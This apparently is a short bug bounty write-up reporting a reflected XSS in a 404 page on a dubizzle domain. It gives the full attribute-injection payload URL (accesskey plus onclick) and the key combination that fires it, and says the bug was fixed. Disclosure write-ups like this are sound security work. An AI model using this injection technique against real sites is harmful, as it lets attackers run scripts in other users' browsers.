OLX Bug Bounty: Reflected XSS

Abay
Abay
Mar 13, 2019 · 1 min read

Who would have thought that there was even a bug that we could find on page 404 Not Found right?

This time I wrote up when I found Reflected XSS on one of the domains in-scope by OLX, sharjah.dubizzle.com.


Step to Reproduce

  • Visit https://sharjah.dubizzle.com/property-for-sale/land" accesskey="X" onclick=alert(1337) codelatte="/2018/10/10/commercial-land-for-sale-in-al-sajja-12/ (you can copy and paste).
  • XSS is reflected inside HTML Link tag
  • Press ALT + SHIFT + X in keyboard to trigger XSS payload.
  • Alert will showing up.

After the bug was fixed, my name entered on the Security Hall of Fame 😎

Reference

https://hackerone.com/reports/504984 (Original Report).
https://portswigger.net/blog/xss-in-hidden-input-fields (XSS in hidden input fields).

PS: Sorry, maybe there are some irreverent words. It’s semi-google-translate. Hopefully you understand that xD

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store